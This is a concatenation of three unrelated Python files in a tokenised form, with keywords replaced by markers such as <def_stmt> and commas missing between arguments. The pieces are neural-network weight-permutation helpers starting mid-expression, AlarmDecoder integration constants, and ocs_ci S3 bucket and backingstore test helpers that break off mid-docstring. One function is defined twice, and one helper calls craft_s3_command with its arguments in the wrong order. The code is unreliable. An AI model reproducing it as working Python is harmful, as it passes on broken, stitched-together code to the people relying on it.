4)<line_sep>h_weights=[]<for_stmt>indices split_range#logger.info("assignments: {}".format(assignments)) <block_start>tempt_h_w=__permutate(weights[indices :] assignments L_next)<line_sep>h_weights.append(tempt_h_w)<line_sep>#logger.info("equal: {}".format(np.array_equal(tempt_h_w, weights[indices, :]))) <block_end><return>np.vstack(h_weights)<block_end><def_stmt>patch_biases biases L_next assignments# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256) <block_start><def_stmt>__permutate bias assignments L_next<block_start>new_w_j=np.zeros(L_next)<line_sep>new_w_j[assignments]=bias<line_sep><return>new_w_j<block_end>splitted_bias=np.split(biases 4)<line_sep>h_bias=[__permutate(sb assignments L_next)<for>sb splitted_bias]<line_sep><return>np.hstack(h_bias)<block_end><def_stmt>perm_i_weights w_j L_next assignment_j_c<block_start>split_range=np.split(np.arange(w_j.shape[0]) 4)<line_sep>res=[]<for_stmt>i range(4)<block_start>cand_w_j=w_j[split_range[i] :]<line_sep>temp_new_w_j=np.zeros((L_next w_j.shape[1]))<line_sep>temp_new_w_j[assignment_j_c :]=cand_w_j<line_sep>res.append(temp_new_w_j)<block_end><return>np.vstack(res)<block_end><def_stmt>patch_i_weights weights L_next assignments# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256) <block_start><def_stmt>__permutate weight assignments L_next<block_start>new_w_j=np.zeros((L_next L_next) dtype=np.float32)<line_sep>new_w_j[np.ix_(assignments assignments)]=weight# TODO(hwang): make sure if this is correct <return>new_w_j<block_end>split_range=np.split(np.arange(weights.shape[0]) 4)<line_sep>h_weights=[__permutate(weights[indices :] assignments L_next)<for>indices split_range]<line_sep><return>np.hstack(h_weights).T<block_end><def_stmt>patch_i_biases biases L_next assignments# e.g. (1024, 256) comes from (256,256)|(256,256)|(256,256)|(256,256) <block_start><def_stmt>__permutate bias assignments L_next<block_start>new_w_j=np.zeros(L_next dtype=np.float32)<line_sep>new_w_j[assignments]=bias<line_sep><return>new_w_j<block_end>splitted_bias=np.split(biases 4)<line_sep>h_bias=[__permutate(sb assignments L_next)<for>sb splitted_bias]<line_sep><return>np.hstack(h_bias)<block_end><def_stmt>perm_i_weights w_j L_next assignment_j_c<block_start>split_range=np.split(np.arange(w_j.shape[0]) 4)<line_sep>res=[]<for_stmt>i range(4)<block_start>cand_w_j=w_j[split_range[i] :]<line_sep>temp_new_w_j=np.zeros((L_next w_j.shape[1]))<line_sep>temp_new_w_j[assignment_j_c :]=cand_w_j<line_sep>res.append(temp_new_w_j)<block_end><return>np.vstack(res)<block_end>
"""Constants for the AlarmDecoder component."""<line_sep>CONF_ALT_NIGHT_MODE="alt_night_mode"<line_sep>CONF_AUTO_BYPASS="auto_bypass"<line_sep>CONF_CODE_ARM_REQUIRED="code_arm_required"<line_sep>CONF_DEVICE_BAUD="device_baudrate"<line_sep>CONF_DEVICE_PATH="device_path"<line_sep>CONF_RELAY_ADDR="zone_relayaddr"<line_sep>CONF_RELAY_CHAN="zone_relaychan"<line_sep>CONF_ZONE_LOOP="zone_loop"<line_sep>CONF_ZONE_NAME="zone_name"<line_sep>CONF_ZONE_NUMBER="zone_number"<line_sep>CONF_ZONE_RFID="zone_rfid"<line_sep>CONF_ZONE_TYPE="zone_type"<line_sep>DATA_AD="alarmdecoder"<line_sep>DATA_REMOVE_STOP_LISTENER="rm_stop_listener"<line_sep>DATA_REMOVE_UPDATE_LISTENER="rm_update_listener"<line_sep>DATA_RESTART="restart"<line_sep>DEFAULT_ALT_NIGHT_MODE=<false><line_sep>DEFAULT_AUTO_BYPASS=<false><line_sep>DEFAULT_CODE_ARM_REQUIRED=<true><line_sep>DEFAULT_DEVICE_BAUD=115200<line_sep>DEFAULT_DEVICE_HOST="alarmdecoder"<line_sep>DEFAULT_DEVICE_PATH="/dev/ttyUSB0"<line_sep>DEFAULT_DEVICE_PORT=10000<line_sep>DEFAULT_ZONE_TYPE="window"<line_sep>DEFAULT_ARM_OPTIONS={CONF_ALT_NIGHT_MODE:DEFAULT_ALT_NIGHT_MODE CONF_AUTO_BYPASS:DEFAULT_AUTO_BYPASS CONF_CODE_ARM_REQUIRED:DEFAULT_CODE_ARM_REQUIRED }<line_sep>DEFAULT_ZONE_OPTIONS:dict={}<line_sep>DOMAIN="alarmdecoder"<line_sep>OPTIONS_ARM="arm_options"<line_sep>OPTIONS_ZONES="zone_options"<line_sep>PROTOCOL_SERIAL="serial"<line_sep>PROTOCOL_SOCKET="socket"<line_sep>SIGNAL_PANEL_MESSAGE="alarmdecoder.panel_message"<line_sep>SIGNAL_REL_MESSAGE="alarmdecoder.rel_message"<line_sep>SIGNAL_RFX_MESSAGE="alarmdecoder.rfx_message"<line_sep>SIGNAL_ZONE_FAULT="alarmdecoder.zone_fault"<line_sep>SIGNAL_ZONE_RESTORE="alarmdecoder.zone_restore"<line_sep>
""" Helper functions file for working with object buckets """<import_stmt>logging<import_stmt>os<import_stmt>shlex<import_from_stmt>uuid uuid4<import_stmt>boto3<import_from_stmt>botocore.handlers disable_signing<import_from_stmt>ocs_ci.framework config<import_from_stmt>ocs_ci.ocs constants<import_from_stmt>ocs_ci.ocs.exceptions TimeoutExpiredError UnexpectedBehaviour<import_from_stmt>ocs_ci.utility templating<import_from_stmt>ocs_ci.utility.ssl_certs get_root_ca_cert<import_from_stmt>ocs_ci.utility.utils TimeoutSampler run_cmd<import_from_stmt>ocs_ci.helpers.helpers create_resource<line_sep>logger=logging.getLogger(__name__)<def_stmt>craft_s3_command cmd mcg_obj=<none> api=<false> signed_request_creds=<none><block_start>""" Crafts the AWS CLI S3 command including the login credentials and command to be ran Args: mcg_obj: An MCG class instance cmd: The AWSCLI command to run api: True if the call is for s3api, false if s3 signed_request_creds: a dictionary containing AWS S3 creds for a signed request Returns: str: The crafted command, ready to be executed on the pod """<line_sep>api="api"<if>api<else>""<if_stmt>mcg_obj<block_start><if_stmt>mcg_obj.region<block_start>region=f"AWS_DEFAULT_REGION={mcg_obj.region} "<block_end><else_stmt><block_start>region=""<block_end>base_command=(f'sh -c "AWS_CA_BUNDLE={constants.SERVICE_CA_CRT_AWSCLI_PATH} '<concat>f"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "<concat>f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "<concat>f"{region}"<concat>f"aws s3{api} "<concat>f"--endpoint={mcg_obj.s3_internal_endpoint} ")<line_sep>string_wrapper='"'<block_end><elif_stmt>signed_request_creds<block_start><if_stmt>signed_request_creds.get("region")<block_start>region=f'AWS_DEFAULT_REGION={signed_request_creds.get("region")} '<block_end><else_stmt><block_start>region=""<block_end>base_command=(f'sh -c "AWS_ACCESS_KEY_ID={signed_request_creds.get("access_key_id")} '<concat>f'AWS_SECRET_ACCESS_KEY={signed_request_creds.get("access_key")} '<concat>f"{region}"<concat>f"aws s3{api} "<concat>f'--endpoint={signed_request_creds.get("endpoint")} ')<line_sep>string_wrapper='"'<block_end><else_stmt><block_start>base_command=f"aws s3{api} --no-sign-request "<line_sep>string_wrapper=""<block_end><return>f"{base_command}{cmd}{string_wrapper}"<block_end><def_stmt>verify_s3_object_integrity original_object_path result_object_path awscli_pod<block_start>""" Verifies checksum between original object and result object on an awscli pod Args: original_object_path (str): The Object that is uploaded to the s3 bucket result_object_path (str): The Object that is downloaded from the s3 bucket awscli_pod (pod): A pod running the AWSCLI tools Returns: bool: True if checksum matches, False otherwise """<line_sep>md5sum=shlex.split(awscli_pod.exec_cmd_on_pod(command=f"md5sum {original_object_path} {result_object_path}"))<if_stmt>md5sum[0]<eq>md5sum[2]<block_start>logger.info(f"Passed: MD5 comparison for {original_object_path} and {result_object_path}")<line_sep><return><true><block_end><else_stmt><block_start>logger.error(f"Failed: MD5 comparison of {original_object_path} and {result_object_path} - "<concat>f"{md5sum[0]} ≠ {md5sum[2]}")<line_sep><return><false><block_end><block_end><def_stmt>retrieve_test_objects_to_pod podobj target_dir<block_start>""" Downloads all the test objects to a given directory in a given pod. Args: podobj (OCS): The pod object to download the objects to target_dir: The fully qualified path of the download target folder Returns: list: A list of the downloaded objects' names """<line_sep>sync_object_directory(podobj f"s3://{constants.TEST_FILES_BUCKET}" target_dir)<line_sep>downloaded_objects=podobj.exec_cmd_on_pod(f"ls -A1 {target_dir}").split(" ")<line_sep>logger.info(f"Downloaded objects: {downloaded_objects}")<line_sep><return>downloaded_objects<block_end><def_stmt>retrieve_anon_s3_resource <block_start>""" Returns an anonymous boto3 S3 resource by creating one and disabling signing Disabling signing isn't documented anywhere, and this solution is based on a comment by an AWS developer: https://github.com/boto/boto3/issues/134#issuecomment-116766812 Returns: boto3.resource(): An anonymous S3 resource """<line_sep>anon_s3_resource=boto3.resource("s3")<line_sep>anon_s3_resource.meta.client.meta.events.register("choose-signer.s3.*" disable_signing)<line_sep><return>anon_s3_resource<block_end><def_stmt>sync_object_directory podobj src target s3_obj=<none> signed_request_creds=<none><block_start>""" Syncs objects between a target and source directories Args: podobj (OCS): The pod on which to execute the commands and download the objects to src (str): Fully qualified object source path target (str): Fully qualified object target path s3_obj (MCG, optional): The MCG object to use in case the target or source are in an MCG signed_request_creds (dictionary, optional): the access_key, secret_key, endpoint and region to use when willing to send signed aws s3 requests """<line_sep>logger.info(f"Syncing all objects and directories from {src} to {target}")<line_sep>retrieve_cmd=f"sync {src} {target}"<if_stmt>s3_obj<block_start>secrets=[s3_obj.access_key_id s3_obj.access_key s3_obj.s3_internal_endpoint]<block_end><elif_stmt>signed_request_creds<block_start>secrets=[signed_request_creds.get("access_key_id") signed_request_creds.get("access_key") signed_request_creds.get("endpoint") ]<block_end><else_stmt><block_start>secrets=<none><block_end>podobj.exec_cmd_on_pod(command=craft_s3_command(retrieve_cmd s3_obj signed_request_creds=signed_request_creds) out_yaml_format=<false> secrets=secrets ) "Failed to sync objects"<line_sep># Todo: check that all objects were synced successfully <block_end><def_stmt>rm_object_recursive podobj target mcg_obj option=""<block_start>""" Remove bucket objects with --recursive option Args: podobj (OCS): The pod on which to execute the commands and download the objects to target (str): Fully qualified bucket target path mcg_obj (MCG, optional): The MCG object to use in case the target or source are in an MCG option (str): Extra s3 remove command option """<line_sep>rm_command=f"rm s3://{target} --recursive {option}"<line_sep>podobj.exec_cmd_on_pod(command=craft_s3_command(rm_command mcg_obj) out_yaml_format=<false> secrets=[mcg_obj.access_key_id mcg_obj.access_key mcg_obj.s3_internal_endpoint ] )<block_end><def_stmt>get_rgw_restart_counts <block_start>""" Gets the restart count of the RGW pods Returns: list: restart counts of RGW pods """<line_sep># Internal import in order to avoid circular import <import_from_stmt>ocs_ci.ocs.resources.pod get_rgw_pods<line_sep>rgw_pods=get_rgw_pods()<line_sep><return>[rgw_pod.restart_count<for>rgw_pod rgw_pods]<block_end><def_stmt>write_individual_s3_objects mcg_obj awscli_pod bucket_factory downloaded_files target_dir bucket_name=<none><block_start>""" Writes objects one by one to an s3 bucket Args: mcg_obj (obj): An MCG object containing the MCG S3 connection credentials awscli_pod (pod): A pod running the AWSCLI tools bucket_factory: Calling this fixture creates a new bucket(s) downloaded_files (list): List of downloaded object keys target_dir (str): The fully qualified path of the download target folder bucket_name (str): Name of the bucket (default: none) """<line_sep>bucketname=bucket_name<or>bucket_factory(1)[0].name<line_sep>logger.info("Writing objects to bucket")<for_stmt>obj_name downloaded_files<block_start>full_object_path=f"s3://{bucketname}/{obj_name}"<line_sep>copycommand=f"cp {target_dir}{obj_name} {full_object_path}"<assert_stmt>"Completed"<in>awscli_pod.exec_cmd_on_pod(command=craft_s3_command(copycommand mcg_obj) out_yaml_format=<false> secrets=[mcg_obj.access_key_id mcg_obj.access_key mcg_obj.s3_internal_endpoint ] )<block_end><block_end><def_stmt>upload_parts mcg_obj awscli_pod bucketname object_key body_path upload_id uploaded_parts<block_start>""" Uploads individual parts to a bucket Args: mcg_obj (obj): An MCG object containing the MCG S3 connection credentials awscli_pod (pod): A pod running the AWSCLI tools bucketname (str): Name of the bucket to upload parts on object_key (list): Unique object Identifier body_path (str): Path of the directory on the aws pod which contains the parts to be uploaded upload_id (str): Multipart Upload-ID uploaded_parts (list): list containing the name of the parts to be uploaded Returns: list: List containing the ETag of the parts """<line_sep>parts=[]<line_sep>secrets=[mcg_obj.access_key_id mcg_obj.access_key mcg_obj.s3_internal_endpoint]<for_stmt>count,part enumerate(uploaded_parts 1)<block_start>upload_cmd=(f"upload-part --bucket {bucketname} --key {object_key}"<concat>f" --part-number {count} --body {body_path}/{part}"<concat>f" --upload-id {upload_id}")<line_sep># upload_cmd will return ETag, upload_id etc which is then split to get just the ETag part=(awscli_pod.exec_cmd_on_pod(command=craft_s3_command(upload_cmd mcg_obj api=<true>) out_yaml_format=<false> secrets=secrets ).split('"')[-3].split("\\")[0])<line_sep>parts.append({"PartNumber":count "ETag":f'"{part}"'})<block_end><return>parts<block_end><def_stmt>oc_create_aws_backingstore cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with aws underlying storage using oc create command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>bs_data=templating.load_yaml(constants.MCG_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["metadata"]["namespace"]=config.ENV_DATA["cluster_namespace"]<line_sep>bs_data["spec"]={"type":"aws-s3" "awsS3":{"targetBucket":uls_name "region":region "secret":{"name":cld_mgr.aws_client.secret.name} } }<line_sep>create_resource(**bs_data)<block_end><def_stmt>cli_create_aws_backingstore mcg_obj cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with aws underlying storage using noobaa cli command Args: mcg_obj (MCG): Used for execution for the NooBaa CLI command cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create aws-s3 {backingstore_name} "<concat>f"--access-key {cld_mgr.aws_client.access_key} "<concat>f"--secret-key {cld_mgr.aws_client.secret_key} "<concat>f"--target-bucket {uls_name} --region {region}")<block_end><def_stmt>oc_create_google_backingstore cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with GCP underlying storage using oc create command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>bs_data=templating.load_yaml(constants.MCG_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["spec"]={"type":constants.BACKINGSTORE_TYPE_GOOGLE "googleCloudStorage":{"targetBucket":uls_name "secret":{"name":cld_mgr.gcp_client.secret.name} } }<line_sep>create_resource(**bs_data)<block_end><def_stmt>cli_create_google_backingstore mcg_obj cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with GCP underlying storage using a NooBaa CLI command Args: mcg_obj (MCG): Used for execution for the NooBaa CLI command cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create google-cloud-storage {backingstore_name} "<concat>f"--private-key-json-file {constants.GOOGLE_CREDS_JSON_PATH} "<concat>f"--target-bucket {uls_name}")<block_end><def_stmt>oc_create_azure_backingstore cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with Azure underlying storage using oc create command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>bs_data=templating.load_yaml(constants.MCG_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["spec"]={"type":constants.BACKINGSTORE_TYPE_AZURE "azureBlob":{"targetBlobContainer":uls_name "secret":{"name":cld_mgr.azure_client.secret.name} } }<line_sep>create_resource(**bs_data)<block_end><def_stmt>cli_create_azure_backingstore mcg_obj cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with aws underlying storage using noobaa cli command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create azure-blob {backingstore_name} "<concat>f"--account-key {cld_mgr.azure_client.credential} "<concat>f"--account-name {cld_mgr.azure_client.account_name} "<concat>f"--target-blob-container {uls_name}")<block_end><def_stmt>oc_create_ibmcos_backingstore cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with IBM COS underlying storage using oc create command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>bs_data=templating.load_yaml(constants.MCG_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["metadata"]["namespace"]=config.ENV_DATA["cluster_namespace"]<line_sep>bs_data["spec"]={"type":"ibm-cos" "ibmCos":{"targetBucket":uls_name "signatureVersion":"v2" "endpoint":constants.IBM_COS_GEO_ENDPOINT_TEMPLATE.format(cld_mgr.ibmcos_client.region.lower()) "secret":{"name":cld_mgr.ibmcos_client.secret.name} } }<line_sep>create_resource(**bs_data)<block_end><def_stmt>cli_create_ibmcos_backingstore mcg_obj cld_mgr backingstore_name uls_name region<block_start>""" Create a new backingstore with IBM COS underlying storage using a NooBaa CLI command Args: cld_mgr (CloudManager): holds secret for backingstore creation backingstore_name (str): backingstore name uls_name (str): underlying storage name region (str): which region to create backingstore (should be the same as uls) """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create ibm-cos {backingstore_name} "<concat>f"--access-key {cld_mgr.ibmcos_client.access_key} "<concat>f"--secret-key {cld_mgr.ibmcos_client.secret_key} "<concat>f"""--endpoint {constants.IBM_COS_GEO_ENDPOINT_TEMPLATE.format(cld_mgr.ibmcos_client.region.lower())} """<concat>f"--target-bucket {uls_name}")<block_end><def_stmt>oc_create_s3comp_backingstore cld_mgr backingstore_name uls_name region<block_start><pass><block_end><def_stmt>cli_create_s3comp_backingstore cld_mgr backingstore_name uls_name region<block_start><pass><block_end><def_stmt>oc_create_pv_backingstore backingstore_name vol_num size storage_class<block_start>""" Create a new backingstore with pv underlying storage using oc create command Args: backingstore_name (str): backingstore name vol_num (int): number of pv volumes size (int): each volume size in GB storage_class (str): which storage class to use """<line_sep>bs_data=templating.load_yaml(constants.PV_BACKINGSTORE_YAML)<line_sep>bs_data["metadata"]["name"]=backingstore_name<line_sep>bs_data["metadata"]["namespace"]=config.ENV_DATA["cluster_namespace"]<line_sep>bs_data["spec"]["pvPool"]["resources"]["requests"]["storage"]=str(size)+"Gi"<line_sep>bs_data["spec"]["pvPool"]["numVolumes"]=vol_num<line_sep>bs_data["spec"]["pvPool"]["storageClass"]=storage_class<line_sep>create_resource(**bs_data)<line_sep>wait_for_pv_backingstore(backingstore_name config.ENV_DATA["cluster_namespace"])<block_end><def_stmt>cli_create_pv_backingstore mcg_obj backingstore_name vol_num size storage_class<block_start>""" Create a new backingstore with pv underlying storage using noobaa cli command Args: backingstore_name (str): backingstore name vol_num (int): number of pv volumes size (int): each volume size in GB storage_class (str): which storage class to use """<line_sep>mcg_obj.exec_mcg_cmd(f"backingstore create pv-pool {backingstore_name} --num-volumes "<concat>f"{vol_num} --pv-size-gb {size} --storage-class {storage_class}")<line_sep>wait_for_pv_backingstore(backingstore_name config.ENV_DATA["cluster_namespace"])<block_end><def_stmt>wait_for_pv_backingstore backingstore_name namespace=<none><block_start>""" wait for existing pv backing store to reach OPTIMAL state Args: backingstore_name (str): backingstore name namespace (str): backing store's namespace """<line_sep>namespace=namespace<or>config.ENV_DATA["cluster_namespace"]<line_sep>sample=TimeoutSampler(timeout=240 sleep=15 func=check_pv_backingstore_status backingstore_name=backingstore_name namespace=namespace )<if_stmt><not>sample.wait_for_func_status(result=<true>)<block_start>logger.error(f"Backing Store {backingstore_name} never reached OPTIMAL state")<line_sep><raise>TimeoutExpiredError<block_end><else_stmt><block_start>logger.info(f"Backing Store {backingstore_name} created successfully")<block_end><block_end><def_stmt>check_pv_backingstore_status backingstore_name namespace=<none> desired_status=constants.HEALTHY_PV_BS<block_start>""" check if existing pv backing store is in OPTIMAL state Args: backingstore_name (str): backingstore name namespace (str): backing store's namespace desired_status (str): desired state for the backing store, if None is given then desired is the Healthy status Returns: bool: True if backing store is in the desired state """<line_sep>kubeconfig=os.getenv("KUBECONFIG")<line_sep>kubeconfig=f"--kubeconfig {kubeconfig}"<if>kubeconfig<else>""<line_sep>namespace=namespace<or>config.ENV_DATA["cluster_namespace"]<line_sep>cmd=(f"oc get backingstore -n {namespace} {kubeconfig} {backingstore_name} "<concat>"-o=jsonpath=`{.status.mode.modeCode}`")<line_sep>res=run_cmd(cmd=cmd)<line_sep><return><true><if>res<in>desired_status<else><false><block_end><def_stmt>create_multipart_upload s3_obj bucketname object_key<block_start>""" Initiates Multipart Upload Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket on which multipart upload to be initiated on object_key (str): Unique object Identifier Returns: str : Multipart Upload-ID """<line_sep>mpu=s3_obj.s3_client.create_multipart_upload(Bucket=bucketname Key=object_key)<line_sep>upload_id=mpu["UploadId"]<line_sep><return>upload_id<block_end><def_stmt>list_multipart_upload s3_obj bucketname<block_start>""" Lists the multipart upload details on a bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : Dictionary containing the multipart upload details """<line_sep><return>s3_obj.s3_client.list_multipart_uploads(Bucket=bucketname)<block_end><def_stmt>list_uploaded_parts s3_obj bucketname object_key upload_id<block_start>""" Lists uploaded parts and their ETags Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier upload_id (str): Multipart Upload-ID Returns: dict : Dictionary containing the multipart upload details """<line_sep><return>s3_obj.s3_client.list_parts(Bucket=bucketname Key=object_key UploadId=upload_id)<block_end><def_stmt>complete_multipart_upload s3_obj bucketname object_key upload_id parts<block_start>""" Completes the Multipart Upload Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier upload_id (str): Multipart Upload-ID parts (list): List containing the uploaded parts which includes ETag and part number Returns: dict : Dictionary containing the completed multipart upload details """<line_sep>result=s3_obj.s3_client.complete_multipart_upload(Bucket=bucketname Key=object_key UploadId=upload_id MultipartUpload={"Parts":parts} )<line_sep><return>result<block_end><def_stmt>abort_all_multipart_upload s3_obj bucketname object_key<block_start>""" Abort all Multipart Uploads for this Bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier Returns: list : List of aborted upload ids """<line_sep>multipart_list=s3_obj.s3_client.list_multipart_uploads(Bucket=bucketname)<line_sep>logger.info(f"Aborting{len(multipart_list)} uploads")<if_stmt>"Uploads"<in>multipart_list<block_start><return>[s3_obj.s3_client.abort_multipart_upload(Bucket=bucketname Key=object_key UploadId=upload["UploadId"])<for>upload multipart_list["Uploads"]]<block_end><else_stmt><block_start><return><none><block_end><block_end><def_stmt>abort_multipart s3_obj bucketname object_key upload_id<block_start>""" Aborts a Multipart Upload for this Bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier upload_id (str): Multipart Upload-ID Returns: str : aborted upload id """<line_sep><return>s3_obj.s3_client.abort_multipart_upload(Bucket=bucketname Key=object_key UploadId=upload_id)<block_end><def_stmt>put_bucket_policy s3_obj bucketname policy<block_start>""" Adds bucket policy to a bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket policy (str): Bucket policy in Json format Returns: dict : Bucket policy response """<line_sep><return>s3_obj.s3_client.put_bucket_policy(Bucket=bucketname Policy=policy)<block_end><def_stmt>get_bucket_policy s3_obj bucketname<block_start>""" Gets bucket policy from a bucket Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : Get Bucket policy response """<line_sep><return>s3_obj.s3_client.get_bucket_policy(Bucket=bucketname)<block_end><def_stmt>delete_bucket_policy s3_obj bucketname<block_start>""" Deletes bucket policy Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : Delete Bucket policy response """<line_sep><return>s3_obj.s3_client.delete_bucket_policy(Bucket=bucketname)<block_end><def_stmt>s3_put_object s3_obj bucketname object_key data content_type=""<block_start>""" Simple Boto3 client based Put object Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier data (str): string content to write to a new S3 object content_type (str): Type of object data. eg: html, txt etc, Returns: dict : Put object response """<line_sep><return>s3_obj.s3_client.put_object(Bucket=bucketname Key=object_key Body=data ContentType=content_type)<block_end><def_stmt>s3_get_object s3_obj bucketname object_key versionid=""<block_start>""" Simple Boto3 client based Get object Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier versionid (str): Unique version number of an object Returns: dict : Get object response """<line_sep><return>s3_obj.s3_client.get_object(Bucket=bucketname Key=object_key VersionId=versionid)<block_end><def_stmt>s3_delete_object s3_obj bucketname object_key versionid=<none><block_start>""" Simple Boto3 client based Delete object Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket object_key (str): Unique object Identifier versionid (str): Unique version number of an object Returns: dict : Delete object response """<if_stmt>versionid<block_start><return>s3_obj.s3_client.delete_object(Bucket=bucketname Key=object_key VersionId=versionid)<block_end><else_stmt><block_start><return>s3_obj.s3_client.delete_object(Bucket=bucketname Key=object_key)<block_end><block_end><def_stmt>s3_put_bucket_website s3_obj bucketname website_config<block_start>""" Boto3 client based Put bucket website function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket website_config (dict): Website configuration info Returns: dict : PutBucketWebsite response """<line_sep><return>s3_obj.s3_client.put_bucket_website(Bucket=bucketname WebsiteConfiguration=website_config)<block_end><def_stmt>s3_get_bucket_website s3_obj bucketname<block_start>""" Boto3 client based Get bucket website function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : GetBucketWebsite response """<line_sep><return>s3_obj.s3_client.get_bucket_website(Bucket=bucketname)<block_end><def_stmt>s3_delete_bucket_website s3_obj bucketname<block_start>""" Boto3 client based Delete bucket website function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket Returns: dict : DeleteBucketWebsite response """<line_sep><return>s3_obj.s3_client.delete_bucket_website(Bucket=bucketname)<block_end><def_stmt>s3_put_bucket_versioning s3_obj bucketname status="Enabled" s3_client=<none><block_start>""" Boto3 client based Put Bucket Versioning function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket status (str): 'Enabled' or 'Suspended'. Default 'Enabled' s3_client : Any s3 client resource Returns: dict : PutBucketVersioning response """<if_stmt>s3_client<block_start><return>s3_client.put_bucket_versioning(Bucket=bucketname VersioningConfiguration={"Status":status})<block_end><else_stmt><block_start><return>s3_obj.s3_client.put_bucket_versioning(Bucket=bucketname VersioningConfiguration={"Status":status})<block_end><block_end><def_stmt>s3_get_bucket_versioning s3_obj bucketname s3_client=<none><block_start>""" Boto3 client based Get Bucket Versioning function Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket s3_client: Any s3 client resource Returns: dict : GetBucketVersioning response """<if_stmt>s3_client<block_start><return>s3_client.get_bucket_versioning(Bucket=bucketname)<block_end><else_stmt><block_start><return>s3_obj.s3_client.get_bucket_versioning(Bucket=bucketname)<block_end><block_end><def_stmt>s3_list_object_versions s3_obj bucketname prefix=""<block_start>""" Boto3 client based list object Versionfunction Args: s3_obj (obj): MCG or OBC object bucketname (str): Name of the bucket prefix (str): Object key prefix Returns: dict : List object version response """<line_sep><return>s3_obj.s3_client.list_object_versions(Bucket=bucketname Prefix=prefix)<block_end><def_stmt>s3_io_create_delete mcg_obj awscli_pod bucket_factory<block_start>""" Running IOs on s3 bucket Args: mcg_obj (obj): An MCG object containing the MCG S3 connection credentials awscli_pod (pod): A pod running the AWSCLI tools bucket_factory: Calling this fixture creates a new bucket(s) """<line_sep>target_dir="/aws/"+uuid4().hex+"_original/"<line_sep>downloaded_files=retrieve_test_objects_to_pod(awscli_pod target_dir)<line_sep>bucketname=bucket_factory(1)[0].name<line_sep>uploaded_objects_paths=get_full_path_object(downloaded_files bucketname)<line_sep>write_individual_s3_objects(mcg_obj awscli_pod bucket_factory downloaded_files target_dir bucket_name=bucketname )<line_sep>del_objects(uploaded_objects_paths awscli_pod mcg_obj)<line_sep>awscli_pod.exec_cmd_on_pod(command=f"rm -rf {target_dir}")<block_end><def_stmt>del_objects uploaded_objects_paths awscli_pod mcg_obj<block_start>""" Deleting objects from bucket Args: uploaded_objects_paths (list): List of object paths awscli_pod (pod): A pod running the AWSCLI tools mcg_obj (obj): An MCG object containing the MCG S3 connection credentials """<for_stmt>uploaded_filename uploaded_objects_paths<block_start>logger.info(f"Deleting object {uploaded_filename}")<line_sep>awscli_pod.exec_cmd_on_pod(command=craft_s3_command(mcg_obj "rm "+uploaded_filename) secrets=[mcg_obj.access_key_id mcg_obj.access_key mcg_obj.s3_internal_endpoint ] )<block_end><block_end><def_stmt>get_full_path_object downloaded_files bucket_name<block_start>""" Getting full of object in the bucket Args: downloaded_files (list): List of downloaded files bucket_name (str): Name of the bucket Returns: uploaded_objects_paths (list) : List of full paths of objects """<line_sep>uploaded_objects_paths=[]<for_stmt>uploaded_filename downloaded_files<block_start>uploaded_objects_paths.append(f"s3://{bucket_name}/{uploaded_filename}")<block_end><return>uploaded_objects_paths<block_end><def_stmt>obc_io_create_delete mcg_obj awscli_pod bucket_factory<block_start>""" Running IOs on OBC interface Args: 